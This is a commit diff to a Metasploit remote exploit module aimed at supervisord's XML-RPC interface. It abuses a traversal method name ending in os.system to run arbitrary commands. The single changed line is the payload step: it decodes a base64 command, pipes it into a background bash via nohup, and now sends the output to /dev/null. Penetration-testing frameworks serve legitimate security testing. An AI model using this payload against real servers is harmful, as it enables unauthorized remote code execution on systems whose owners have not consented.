Rework the bash, redirect stdout/err to /dev/null

Dont need the -
bug/bundler_fix
Calum Hutton 2017-08-30 03:49:30 +01:00
parent 9387a765e5
commit 3b745bd17c
1 changed files with 1 additions and 1 deletions

View File

@ -125,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash - &amp;</string>
<string>echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash > /dev/null 2>&amp;1 &amp;</string>
</param>
</params>
</methodCall>}